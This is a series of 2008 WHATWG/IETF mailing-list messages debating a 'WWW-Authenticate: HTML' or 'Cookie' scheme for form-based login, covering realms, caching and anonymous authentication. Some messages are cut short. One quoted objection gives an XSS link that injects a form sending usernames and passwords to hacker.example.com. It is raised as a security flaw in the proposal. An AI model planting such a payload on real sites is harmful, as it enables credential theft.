Re: [whatwg] Solving the login/logout problem in HTML
[ CC: ietf-http-wg, ietf-http-auth; please follow up to ietf-http-auth only ]

See http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-November/017569.html
The thread started at http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-November/017413.html

On Wed, Nov 26, 2008 at 12:47 PM, Thomas Broyer wrote:
> On Tue, Nov 25, 2008 at 6:26 AM, Ian Hickson wrote:
>> It seems to me that the first limitation of form authentication could be removed by inventing a new WWW-Authenticate challenge that means "reply to the form in the page". I have now specified such a value in HTML5 (since it is specific to entity bodies that contain HTML forms):
>
> I came to the same conclusion [...]

On Thu, Nov 27, 2008 at 9:38 PM, Ian Hickson wrote:
> On Thu, 27 Nov 2008, Julian Reschke wrote:
>> The specification of this scheme (which essentially is a no-op to implement for browser vendors and which already works almost everywhere) could either happen in the W3C or in the IETF. I'm happy to assist in case the latter alternative is chosen.
>
> I've removed the text from HTML5. If anyone wants to run with this and specify it in a separate document, please let me know.
> [...]
> Thanks everyone for the feedback on this idea. I recommend that interested parties get together and come up with a simple RFC for a better solution.

For the record, my initial thoughts (a year or two ago) were about a Cookie auth scheme:

    challenge        = "Cookie" cookie-challenge
    cookie-challenge = 1#( realm | [ form-action ] | cookie-name |
                           [ test-cookie-name ] | [ auth-param ] )
    form-action      = "form-action" "=" URI
    URI              = absoluteURI | abs_path
    cookie-name      = "cookie-name" "=" token
    test-cookie-name = "test-cookie-name" "=" token

where form-action is the HTML/XForms/whatever form's action URL (so that you know that a form in the document submitting data to this URL is (potentially) a login form). form-action must resolve to an HTTP/HTTPS URL where the authority contains no userinfo, the host has the same constraints as the Domain of a Set-Cookie, and the abs_path has the same constraints as the Path of a Set-Cookie.

The cookie-name param gives the name of the cookie that will be set after a submission to form-action to maintain the authenticated session; a UA could then accept such a cookie even if configured to reject cookies or ask the user, because it then knows the cookie is a kind of credentials for subsequent requests.

The test-cookie-name param names a cookie set within the same HTTP response that will be checked by form-action as a means to detect whether the UA accepts cookies. A UA could then silently, temporarily accept such a cookie, even if configured to reject cookies or ask the user, and send it with the submission to form-action.

The path of the cookie set in the response from form-action defines the protection space.

I also had the idea of somehow relaxing how a UA has to manage those cookies, and therefore setting constraints for servers on how they set their values. For example, the UA could be allowed to ignore changes in value: once the cookie has been set, its value is fixed until expiration. This is to prevent servers from using this cookie to store session info, particularly in the case where the user has configured the UA to reject cookies altogether; the cookie value is considered an authentication token that does not change over time for a given authenticated session (the lifetime of the cookie).

Also (eventually), when contacting form-action, the UA shouldn't (mustn't?) react to authentication challenges (apart from a Cookie challenge identical to the one received in the previous request).

Example (simplified messages):

1. User Agent -> Server

    GET http://www.example.com/acme/ HTTP/1.1

2. Server -> User Agent

    HTTP/1.1 401 Unauthorized
    WWW-Authenticate: Cookie realm="Acme" form-action="https://secure.example.com/acme/login" cookie-name=ACME_TICKET test-cookie-name=TEST_ACME
    Set-Cookie: TEST_ACME=test; Version=1; Path=/acme; Secure; Domain=.example.com
    Content-Type: text/html

    <title>Unauthorized</title>
    <form action="https://secure.example.com/acme/login" method=POST>
    <input type=hidden name=referer value="http://www.example.com/acme/">
    <p><label>Username: <input name=user></label>
    <p><label>Password: <input name=pwd type=password></label>
    <p><button type=submit>Sign in</button>
    <p><a href=/acme/register>Register for an account</a>
    </form>

3. User Agent -> Server

    POST https://secure.example.com/acme/login HTTP/1.1
    Cookie: $Version=1; TEST_ACME=test; $Path=/acme; $Domain=.example.com
    Content-Type: application/x-www-form-urlencoded

    referer=http%3A%2F%2Fwww.example.com%2Facme%2F&user=Aladdin&password=open%20sesame

4. Server -> User Agent

    HTTP/1.1 303 See Other
    Location: http://www.example.com/acme/
    Set-Cookie:
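As a rough illustration of how a user agent might read the Cookie challenge proposed in this message, here is a minimal Python sketch. It is not part of the proposal: the function names `parse_cookie_challenge` and `form_action_is_acceptable` are hypothetical, the parameter syntax (space- or comma-separated `name=value` pairs, values optionally quoted) is an assumption, and only the "HTTP/HTTPS URL with no userinfo" constraint on form-action is checked. The Domain and Path constraints are left out.

```python
import re
from urllib.parse import urljoin, urlsplit

# name=value pairs; the value is either a quoted string or a bare token.
_PARAM = re.compile(r'([A-Za-z0-9-]+)\s*=\s*(?:"([^"]*)"|([^\s,;"]+))')


def parse_cookie_challenge(header_value):
    """Split a hypothetical 'Cookie ...' challenge into a dict of parameters."""
    scheme, _, rest = header_value.strip().partition(" ")
    if scheme.lower() != "cookie":
        raise ValueError("not a Cookie challenge")
    params = {}
    for name, quoted, bare in _PARAM.findall(rest):
        params[name.lower()] = quoted if quoted else bare
    # realm and cookie-name are not optional in the proposed grammar.
    for required in ("realm", "cookie-name"):
        if required not in params:
            raise ValueError("missing required parameter: " + required)
    return params


def form_action_is_acceptable(request_url, form_action):
    """Check that form-action resolves to an HTTP(S) URL without userinfo."""
    parts = urlsplit(urljoin(request_url, form_action))
    return (
        parts.scheme in ("http", "https")
        and parts.username is None
        and parts.password is None
        and bool(parts.hostname)
    )
```

Applied to the challenge in step 2 of the example, `parse_cookie_challenge` would yield the realm, the login URL, and the two cookie names, which a UA could then compare against the forms found in the response body.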
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote:
> On Wed, 26 Nov 2008, Philip Taylor wrote:
>> If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying
>>
>>     <a href="/restricted-access.php?xsshole=<form action=http://hacker.example.com/capture name=login><input name=username><input name=password></form>">crawl me!</a>
>
> Hm, this is indeed a problem.
> [snip]
> Is there anyone who can volunteer to edit this section as a separate spec? I guess I'll remove this section.

I may be forgetting or missing some use-cases here (I don't recall what exactly motivated this custom auth scheme) but there may still be value in a cut-down version of this scheme:

    WWW-Authenticate: HTML

which means (roughly) "The HTML document in the body contains something that, when displayed in a web browser, will allow the user to log in."

Browsers can then use this authentication scheme in preference to Basic or Digest when multiple schemes are offered for a particular resource, and servers can simultaneously offer forms-based authentication and other authentication schemes at the same endpoint:

    HTTP/1.1 401 Unauthorized
    Content-type: text/html
    WWW-Authenticate: HTML
    WWW-Authenticate: Basic realm="my neat site"

    <form action="/login" method="POST"> ... </form>

Software that is not a browser (for some suitable definition of browser -- something along the lines of "user-agent where form-based auth is the norm"?) can choose to use Basic authentication here.

The backward-compatibility story here is bad as long as one of the offered authentication schemes is known to a downlevel browser. Per my basic research posted earlier, other, as-yet-unsupported schemes can be offered and the body will be rendered as desired, except in Opera.

I guess that this could be generalized to:

    WWW-Authenticate: Body

meaning merely "the body contains something that will allow the user to log in". Browsers could presumably in this case take into account the Content-type when deciding whether to prefer this scheme over the other schemes offered, for example choosing Body over Basic only when Content-type is text/html.

I concede that once you generalize it in this way it becomes even less relevant to the HTML spec than it was to begin with, though I'm not sure where else to propose such a thing, and in practice, as long as websites are primarily HTML, login forms presumably will be as well.
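The selection rule described in this message could be sketched in Python as follows. This is only an illustration under assumptions: the function name `choose_scheme` and the `is_browser` flag are hypothetical, and falling back to Digest before Basic is a choice made for the sketch, not something the message specifies.

```python
def choose_scheme(offered_schemes, content_type, is_browser):
    """Pick an authentication scheme from those offered in a 401 response.

    offered_schemes: scheme names from the WWW-Authenticate headers.
    content_type:    value of the Content-Type header of the 401 response.
    is_browser:      True for a UA that renders HTML and submits forms.
    """
    offered = [scheme.lower() for scheme in offered_schemes]
    media_type = content_type.split(";")[0].strip().lower()

    # A browser prefers the in-body login form, but only if it can render it.
    if is_browser and media_type == "text/html":
        for body_scheme in ("html", "body"):
            if body_scheme in offered:
                return body_scheme

    # Everything else falls back to a conventional scheme, if one is offered.
    # (Preferring Digest over Basic is an assumption of this sketch.)
    for scheme in ("digest", "basic"):
        if scheme in offered:
            return scheme
    return None
```

With the 401 response shown above, a browser would get `"html"` and a non-browser client would get `"basic"`.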
Re: [whatwg] Solving the login/logout problem in HTML
Martin Atkins wrote: ... I may be forgetting missing some use-cases here (I don't recall what exactly motivated this custom auth scheme) but there may still be value in a cut-down version of this scheme: ... I concede that once you generalize it in this way it becomes even less relevant to the HTML spec than it was to begin with, though I'm not sure where else to propose such a thing, and in practice as long as websites are primarily HTML login forms presumably will be as well. ... Indeed. The specification of this scheme (which essentially is a no-op to implement for browser vendors and which already works almost everywhere) could either happen in the W3C or in the IETF. I'm happy to assist in case the latter alternative is chosen. Best regards, Julian PS: And, as Robert S. stated, HTML5 should specify that the response body should be displayed when the auth scheme is unknown.
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 10:38 PM, Ian Hickson wrote:
> Ok let me rephrase. What are the user agent requirements for processing the realm value? For other schemes, it's basically "show the realm to the user as a hint as to what password is wanted".

The realm is (should be) part of the key used by password managers:

    "The realm value (case-sensitive), in combination with the canonical root URL […] of the server being accessed, defines the protection space. These realms allow the protected resources on a server to be partitioned into a set of protection spaces, each with its own authentication scheme and/or authorization database." (RFC 2617, § 1.2)

With Basic, the other part of the key is the requested URI (and applies to all deeper URIs as well; the password manager key should then be updated as soon as a request to a shallower URI results in a 401 with the same realm):

    "A client SHOULD assume that all paths at or deeper than the depth of the last symbolic element in the path field of the Request-URI also are within the protection space specified by the Basic realm value of the current challenge. A client MAY preemptively send the corresponding Authorization header with requests for resources in that space without receipt of another challenge from the server." (RFC 2617, § 2)

With Digest, the optional 'domain' parameter explicitly specifies the URI spaces governed by the authentication realm (the 'domain' parameter can thus broaden or narrow the realm):

    "Digest authentication requires that the authenticating agent (usually the server) store some data derived from the user's name and password in a password file associated with a given realm." (RFC 2617, § 4.13)

> But here we aren't going to show anything to the user.

Given that the HTML scheme shows the login form at the requested URI, the autocompletion of credentials that most UAs do cannot be based on the form's URI (or it would impair the user experience). Instead, the realm can be used by the UA to identify the login form and associate the user's credentials in the password manager.

--
Thomas Broyer
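To make the "realm as part of the password-manager key" idea concrete, here is a small Python sketch. It follows the RFC 2617 § 1.2 wording quoted above (canonical root URL plus case-sensitive realm); the function name `protection_space_key` and the way the root URL is canonicalized (lower-cased scheme and host, explicit default port) are assumptions made for the illustration.

```python
from urllib.parse import urlsplit

_DEFAULT_PORTS = {"http": 80, "https": 443}


def protection_space_key(request_url, realm):
    """Build a password-manager lookup key from the server root and the realm."""
    parts = urlsplit(request_url)
    scheme = parts.scheme.lower()
    port = parts.port or _DEFAULT_PORTS.get(scheme)
    # parts.hostname is already lower-cased by urlsplit.
    root = f"{scheme}://{parts.hostname}:{port}"
    # The realm is compared case-sensitively, so it is stored unchanged.
    return (root, realm)


# A toy password store keyed by protection space rather than by form URI.
saved_credentials = {
    protection_space_key("http://www.example.com/acme/", "Acme"): ("Aladdin", "open sesame"),
}
```

Under this scheme, a login form served at any URI on the same server with the same realm would map to the same saved credentials, which is the behaviour argued for above.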
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, Nov 26, 2008 at 11:40 PM, Martin Atkins wrote:
> Julian Reschke wrote:
>> You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated, by adding Vary: Authorization to a response.
>
> According to section 14.8 of the HTTP 1.1 specification, the presence of the Authorization header field implies that the response varies by Authorization:
>
>     "When a shared cache (see section 13.7) receives a request containing an Authorization field, it MUST NOT return the corresponding response as a reply to any other request, unless one of the following specific exceptions holds: [some exceptions in the presence of cache-control directives]"
>
> My understanding of this is that Vary: Authorization is effectively implied for all HTTP responses.

What you're quoting applies only to *shared* caches and only to content cached in response to requests containing an Authorization header (i.e. authenticated requests). What it says is: do not cache any such response unless it has a Cache-Control response header-field that falls in one of those cases; and if you're then allowed to cache it, you're allowed to serve it in response to *any other request* (after having revalidated it eventually), whether it includes an Authorization header or not, and whatever the Authorization header contains.

This means that an origin server receiving an authenticated request to a page that does *not* vary depending on the user being authenticated or not (and which user is authenticated) should respond with a Cache-Control header-field with a public, s-maxage or must-revalidate directive.

Julian is saying that if your page varies depending on the user being authenticated and/or the client not being authenticated at all, you (the origin server) should include a Vary: Authorization. This means that if a shared cache has cached the response to an unauthenticated request and it receives an authenticated request for the same URI, it must not use the cached page but must relay the request back to the origin server. This case is specifically not handled by RFC 2616 AFAICT.

Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a WWW-Authenticate response header-field with a 200 OK status; AFAICT HTTP doesn't disallow it (well, the "MUST be included in 401 response messages" is unclear to me: does it mean a 401 must have a WWW-Authenticate or the WWW-Authenticate must *only* be with a 401, or both?)).

Here's what Fielding says about cookies, which applies to most of the use-cases for "content that's available unauthenticated, but would potentially differ in case of being authenticated":

    "As a result, cookie-based applications on the Web will never be reliable. The same functionality should have been accomplished via anonymous authentication and true client-side state. A state mechanism that involves preferences can be more efficiently implemented using judicious use of context-setting URI rather than cookies, where judicious means one URI per state rather than an unbounded number of URI due to the embedding of a user-id. Likewise, the use of cookies to identify a user-specific shopping basket within a server-side database could be more efficiently implemented by defining the semantics of shopping items within the hypermedia data formats, allowing the user agent to select and store those items within their own client-side shopping basket, complete with a URI to be used for check-out when the client is ready to purchase."

    http://www.ics.uci.edu/~fielding/pubs/dissertation/evaluation.htm#sec_6_3_4_2

--
Thomas Broyer
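The two cache rules discussed in this message can be sketched in Python as below. This is a simplified model for illustration only: headers are plain dicts, the function names are hypothetical, and every other caching rule (no-store, freshness, revalidation, and so on) is deliberately ignored.

```python
def _lower_keys(headers):
    """Return a copy of a header dict with lower-cased field names."""
    return {name.lower(): value for name, value in headers.items()}


def may_store_in_shared_cache(request_headers, response_headers):
    """RFC 2616 section 14.8, as read above: a response to an authenticated
    request is only storable by a shared cache if Cache-Control allows it."""
    request = _lower_keys(request_headers)
    response = _lower_keys(response_headers)
    if "authorization" not in request:
        return True  # section 14.8 does not restrict unauthenticated requests
    directives = {
        item.split("=")[0].strip().lower()
        for item in response.get("cache-control", "").split(",")
    }
    return bool(directives & {"public", "s-maxage", "must-revalidate"})


def cached_response_is_reusable(cached_request, cached_response, new_request):
    """Vary check: every request header named in Vary must match."""
    old = _lower_keys(cached_request)
    new = _lower_keys(new_request)
    vary = _lower_keys(cached_response).get("vary", "")
    for field in vary.split(","):
        field = field.strip().lower()
        if not field:
            continue
        if field == "*" or old.get(field) != new.get(field):
            return False
    return True
```

With `Vary: Authorization` on the cached response, an anonymous entry is not reused for a request that carries an Authorization header, which is the behaviour Julian's suggestion relies on.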
Re: [whatwg] Solving the login/logout problem in HTML
Thomas Broyer wrote:
> ...
> Julian is saying that if your page varies depending on the user being authenticated and/or the client not being authenticated at all, you (the origin server) should include a Vary: Authorization. This means that if a shared cache has cached the response to an unauthenticated request and it receives an authenticated request for the same URI, it must not use the cached page but must relay the request back to the origin server. This case is specifically not handled by RFC 2616 AFAICT.
> ...

It's certainly an area that should be clarified.

> ...
> Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a
> ...

Could you define what "anonymous authentication" would mean precisely?

> WWW-Authenticate response header-field with a 200 OK status; AFAICT HTTP doesn't disallow it (well, the "MUST be included in 401 response messages" is unclear to me: does it mean a 401 must have a WWW-Authenticate or the WWW-Authenticate must *only* be with a 401, or both?).

Only the former. The latter is currently undefined.

The interesting question is whether we can retroactively specify it for 200 responses without breaking existing servers.

...

BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Thu, Nov 27, 2008 at 1:41 PM, Julian Reschke wrote:
> Thomas Broyer wrote:
>> ...
>> Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a
>> ...
>
> Could you define what "anonymous authentication" would mean precisely?

I don't really mind, as long as the server is able to say "I give this thing to you, anonymous user, but you can also authenticate (e.g. to be offered more features)". This is the exact use case many web sites (including most if not all e-commerce web sites) are facing, and it'd be cool if it could be dealt with at the HTTP level.

>> WWW-Authenticate response header-field with a 200 OK status; AFAICT HTTP doesn't disallow it (well, the "MUST be included in 401 response messages" is unclear to me: does it mean a 401 must have a WWW-Authenticate or the WWW-Authenticate must *only* be with a 401, or both?).
>
> Only the former. The latter is currently undefined.

Thanks for the clarification.

> The interesting question is whether we can retroactively specify it for 200 responses without breaking existing servers.

...and clients (and intermediaries, but you might have included them in "servers")

--
Thomas Broyer
Re: [whatwg] Solving the login/logout problem in HTML
Thomas Broyer wrote:
> I don't really mind, as long as the server is able to say "I give this thing to you, anonymous user, but you can also authenticate (e.g. to be offered more features)". This is the exact use case many web sites (including most if not all e-commerce web sites) are facing, and it'd be cool if it could be dealt with at the HTTP level.

Yes, I agree that this is a valid use case. I think Vary: Authorization is sufficient for a client to detect that authenticating will indeed have an effect. What else do we need?

> ...
>> The interesting question is whether we can retroactively specify it for 200 responses without breaking existing servers.
>
> ...and clients (and intermediaries, but you might have included them in "servers")

I was thinking "sites" (when I said "servers"), which would include all parties involved. Indeed.

BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Henri Sivonen wrote: That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. I suspect this will require far more of the bot than merely parsing HTML. Many login forms today effectively require human intelligence to process. After all it's not merely logging in that's at issue but registration. Frankly the current state of the art is one of the most broken and misdesigned aspects of HTML 4, and that's saying a lot. :-( I'll have to consider the detailed proposal, but I tend to think that the solution lies in allowing forms to integrate better with HTTP authentication, not in eliminating HTTP authentication. A form action should be able to set the necessary HTTP headers. Also it should be possible for a form to easily tell the web browser to logout. And it would be nice to have something stronger than HTTP digest authentication for unencrypted channels, though I'd have to leave it to the experts to say if that's possible. -- Elliotte Rusty Harold [EMAIL PROTECTED] Refactoring HTML Just Published! http://www.amazon.com/exec/obidos/ISBN=0321503635/ref=nosim/cafeaulaitA
Re: [whatwg] Solving the login/logout problem in HTML
On Thu, Nov 27, 2008 at 5:56 PM, Julian Reschke wrote:
> Thomas Broyer wrote:
>> I don't really mind, as long as the server is able to say "I give this thing to you, anonymous user, but you can also authenticate (e.g. to be offered more features)". This is the exact use case many web sites (including most if not all e-commerce web sites) are facing, and it'd be cool if it could be dealt with at the HTTP level.
>
> Yes, I agree that this is a valid use case. I think Vary: Authorization is sufficient for a client to detect that authenticating will indeed have an effect. What else do we need?

A challenge! ;-)

...so that the UA knows *how* to authenticate (hence the "WWW-Authenticate in 200" suggestion)

--
Thomas Broyer
Re: [whatwg] Solving the login/logout problem in HTML
Asbjørn Ulsberg wrote:
> [Response 1]
>
>     HTTP/1.1 401 Unauthorized
>     WWW-Authenticate: HTML realm="Administration"
>
>     <!DOCTYPE html>
>     <html>
>       <form action="/login">
>         <input name="username">
>         <input type="password" name="password">
>         <input type="submit">
>       </form>
>     </html>

Interesting. If we go down this line I think it's important to MANDATE the names and meanings of the various fields, or provide some other key by which a bot can reliably identify necessary login fields and decide what to put in them. Today the various form autofillers only guess right a little more than half the time in my experience, and even with training and special hackery to eliminate forms that try to disable autofilling, they still miss a shocking number of forms they've seen before.

--
Elliotte Rusty Harold [EMAIL PROTECTED]
Refactoring HTML Just Published!
http://www.amazon.com/exec/obidos/ISBN=0321503635/ref=nosim/cafeaulaitA
Re: [whatwg] Solving the login/logout problem in HTML
Julian Reschke wrote: ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely? I'm not sure this is what the OP meant, but I'd love a way to register and login *at the same time*. In fact, I implemented a system that did this a few years ago. Basically, give your username and password: if it exists (and matches) you're logged in. If the username doesn't exist, create the user and login. Don't separate registration and login. My system wasn't quite so anonymous in that it did require an e-mail confirmation before the user's requested actions would be taken (posting comments) but it could easily have been anonymous. -- Elliotte Rusty Harold [EMAIL PROTECTED] Refactoring HTML Just Published! http://www.amazon.com/exec/obidos/ISBN=0321503635/ref=nosim/cafeaulaitA
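The combined "register and log in at the same time" flow described in this message could look roughly like the following Python sketch. It is not the system the author built: the in-memory `users` dict, the function name `login_or_register`, the return strings, and the PBKDF2 parameters are all assumptions, and the e-mail confirmation step mentioned above is left out.

```python
import hashlib
import hmac
import os


def _hash_password(password, salt):
    """Derive a password hash; the iteration count is an arbitrary choice."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def login_or_register(users, username, password):
    """Log the user in if the account exists, otherwise create it.

    users maps a username to a (salt, password_hash) tuple.
    Returns "registered", "logged-in" or "rejected".
    """
    record = users.get(username)
    if record is None:
        # Unknown username: create the account and treat it as logged in.
        salt = os.urandom(16)
        users[username] = (salt, _hash_password(password, salt))
        return "registered"
    salt, stored_hash = record
    if hmac.compare_digest(stored_hash, _hash_password(password, salt)):
        return "logged-in"
    return "rejected"
```

One consequence of this design is that a mistyped username silently creates a new account, which is presumably part of why the described system still asked for an e-mail confirmation before acting on the user's requests.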
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL PROTECTED] wrote:
> Martin Atkins wrote:
>> Your auth token here seems to me to be equivalent to a session cookie.

Yes, it does. But since session cookies are just that, cookies, it isn't. An authentication token is different from a session cookie in that it can be persistent, based on the user's preferences; it won't be blocked by default anywhere (once supported, that is), since it isn't using the same fragile technology used by advertisers to track users and wreck their privacy; and it won't have any of the problems cookies have, since it isn't a cookie.

> Perhaps that token was meant as a cross-session one, surviving until an explicit logout

Yes, among other things. Since we're inventing a new token here, we can place any semantics and functionality in it we want. Re-using cookies would take us exactly zero steps in the right direction. Cookies have their place, but authentication is theoretically, imho, not one of them. In practice, there's really no other alternative today.

--
Asbjørn Ulsberg -=|=- [EMAIL PROTECTED]
«He's a loathsome offensive brute, yet I can't look away»
Re: [whatwg] Solving the login/logout problem in HTML
Martin Atkins wrote:
> This idea has promise, but is it compatible with existing browsers?
>
> The case where the only challenge included is HTML is probably okay, since browsers will at this point likely determine that they don't support any of the given schemes and just display the entity body. The only concern in this case is browser-provided default error pages for the 401 response, which can hopefully be suppressed in much the same way as sites suppress IE's default 404 error page by padding the response to take it above a certain filesize.
>
> More bothersome is this case:
>
>     HTTP/1.1 401 Unauthorized
>     ...
>     WWW-Authenticate: HTML form="login"
>     WWW-Authenticate: Basic realm="..."
>     ...

Is that case relevant? Today, those sites do not support Basic (or Digest) at all, or only send the 401 for certain user agents and/or methods. So I wouldn't expect them to start adding the non-HTML auth challenge...

...

BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Nov 26, 2008, at 13:19, Julian Reschke wrote: So wouldn't it make sense to address the common use case so that it doesn't require the bot (the non-HTML UA) to parse the response body? That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. -- Henri Sivonen [EMAIL PROTECTED] http://hsivonen.iki.fi/
Re: [whatwg] Solving the login/logout problem in HTML
Henri Sivonen wrote: That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. I'll be convinced when I see support for this being integrated into the MacOsX and Microsoft Windows WebDAV clients. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote:
> ...and there must be a form element with name=login, which represents the form that must be submitted to log in.

Forgive me if this is a stupid question... but anyway: are there other cases where values of the name attribute have special functionality? If not, I'd suggest using the type attribute instead, or introducing an empty attribute such as loginform.
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote:
> ...
> I don't understand why it makes a difference what the form is like. It should apply whatever credentials it has been given -- whatever those might be, username/password, certificate, fake address and phone number, whatever, and submit the form. Just like a user.
> ...

If the form is more complex than two fields (identity/secret), then I don't see how authentication is going to work except by displaying the form -- just extracting the field names certainly wouldn't be sufficient, even if they were reasonably self-describing.

So, in the current form, this proposal only helps in marking the server's response as *being* a login form, but not really in making it more usable for a non-HTML client...

BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Thomas Broyer wrote:
> I came to the same conclusion and already implemented it (with a custom application-specific scheme) in an Enterprise app (the custom scheme accepts both HTML form, i.e. cookie, and an Authorization request-header -- we're using it for XMLHttpRequests to bypass any cookie and therefore allow more than one user session in the same browser session).

Cool!

>     challenge = "HTML" [ form ]
>     form      = "form" "=" form-name
>     form-name = quoted-string
>
> RFC2617 states that "The realm directive (case-insensitive) is required for all authentication schemes that issue a challenge."

I didn't really understand how the realm would work here, which is why I didn't include it. Is this a case where we should violate RFC2617? (Note that we're in a rather unusual case here because the challenge never gets a reply in the traditional sense.)

--
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote:

... As can be seen in the feedback below, there is interest in improving the

So when you get to a page that expects you to be logged in, it returns a 401 with:

    WWW-Authenticate: HTML form="login"

...and there must be a form element with name=login, which represents the form that must be submitted to log in. ...

For security reasons, I'd prefer that to be "the form element", instead of "a form element" -- having multiple copies of the name in the same document should be considered a fatal error.

Having multiple form elements with the same name is already an error.

Yes.

I'm not sure what you mean by "fatal error". The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering?

If every UA is going to run an HTML5 parser as specified, then a problem is unlikely. I just don't believe this is going to happen. In *that* case, ambiguous login information is a problem, and a simple and safe way to avoid this issue is to tell clients to abort when they detect the problem.

Yes, that's a simpler option. :-) (Provided that current browsers still ask for authentication even when given a 200 OK.)

I don't think they do now, but it's something we can move towards.

I think asking for credentials when the status is 200 would be a bug.

Even in the asynchronous way mpt suggested? I think it would go a long way towards addressing the limitations of HTTP authentication. One of the great benefits of HTML authentication forms is that they can be made available in the equivalent of a 200 OK situation as opposed to only in the equivalent of a 401 situation.

You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated, by adding Vary: Authorization to a response.

BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Julian Reschke wrote: Ian Hickson wrote: Anyway, if it's out of sync, authentication is not going to work, so it should be noticed quickly. On the contrary, authentication is going to work fine for 99% of users and it's only when a lone user tries using a bot that it'll break. Yes, that's what I meant: it will not work for the bot. We apparently disagree how frequently this is going to be used. Yes. On Wed, 26 Nov 2008, Julian Reschke wrote: Do you have a concrete example where the login form is complex in a manner where the fields can't be identified and there is reason to believe that a bot will want to authenticate but won't have been given enough information to do so? Well, it was you stating that the form could be arbitrarily complex. It can, yes. HTML allows arbitrarily complex forms, and we don't want to limit login forms to just two fields and a button. (I regularly log in to systems where the login forms are two text fields and a checkbox, or two text fields and a drop down, or five or so text fields. But in none of these cases would I personally expect a bot to ever have my credentials.) If it's just two text fields, one of which of type password, then no, it wouldn't be hard. Ok. -- Ian Hickson U+1047E)\._.,--,'``.fL http://ln.hixie.ch/ U+263A/, _.. \ _\ ;`._ ,. Things that are impossible just take longer. `._.-(,_..'--(,_..'`-.;.'
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: ... On Wed, 26 Nov 2008, Julian Reschke wrote: Do you have a concrete example where the login form is complex in a manner where the fields can't be identified and there is reason to believe that a bot will want to authenticate but won't have been given enough information to do so? Well, it was you stating that the form could be arbitrarily complex. It can, yes. HTML allows arbitrarily complex forms, and we don't want to limit login forms to just two fields and a button. (I regularly log in to systems where the login forms are two text fields and a checkbox, or two text fields and a drop down, or five or so text fields. But in none of these cases would I personally expect a bot to ever have my credentials.) ... Yes. So wouldn't it make sense to address the common use case so that it doesn't require the bot (the non-HTML UA) to parse the response body? BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
Ian Hickson wrote: On Wed, 26 Nov 2008, Julian Reschke wrote: If the form is more complex than two fields (identity/secret), then I don't see how authentication is going to work except by displaying the form -- just extracting the field names certainly wouldn't be sufficient, even if they would be reasonably self-describing. So, in the current form, this proposal only helps in marking the server's response as *being* a login form, but not really in making it more usable for a non-HTML client... Do you have a concrete example where the login form is complex in a manner where the fields can't be identified and there is reason to believe that a bot will want to authenticate but won't have been given enough information to do so? Well, it was you stating that the form could be arbitrarily complex. If it's just two text fields, one of which is of type password, then no, it wouldn't be hard. BR, Julian
Re: [whatwg] Solving the login/logout problem in HTML
On Wed, 26 Nov 2008, Julian Reschke wrote: I'm not sure what you mean by fatal error. The spec precisely defines which form should be used in the case of multiple forms with the same name. Could you describe the attack scenario you are considering? If every UA is going to run an HTML5 parser as specified, then a problem is unlikely. I just don't believe this is going to happen. In *that* case, ambiguous login information is a problem, and a simple and safe way to avoid this issue is to tell clients to abort when they detect the problem. Detecting the case of there being two identically named forms is far more complex than just using the first form with the given name. It is in fact a superset of the functionality -- you have to look for the first form, then look for a second. Whereas the current spec text just says to look for the first form and stop. So as far as I can tell what you are proposing is in fact more complicated, whether you use an HTML5-compliant parser or some other ad hoc HTML parser. Even in the asynchronous way mpt suggested? I think it would go a long way towards addressing the limitations of HTTP authentication. One of the great benefits of HTML authentication forms is that they can be made available in the equivalent of a 200 OK situation as opposed to only in the equivalent of a 401 situation. You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. Ah yes, I forgot that the Vary header would need to be present. But you still need to include the challenge. So that doesn't actually change the original point. -- Ian Hickson
Re: [whatwg] Solving the login/logout problem in HTML
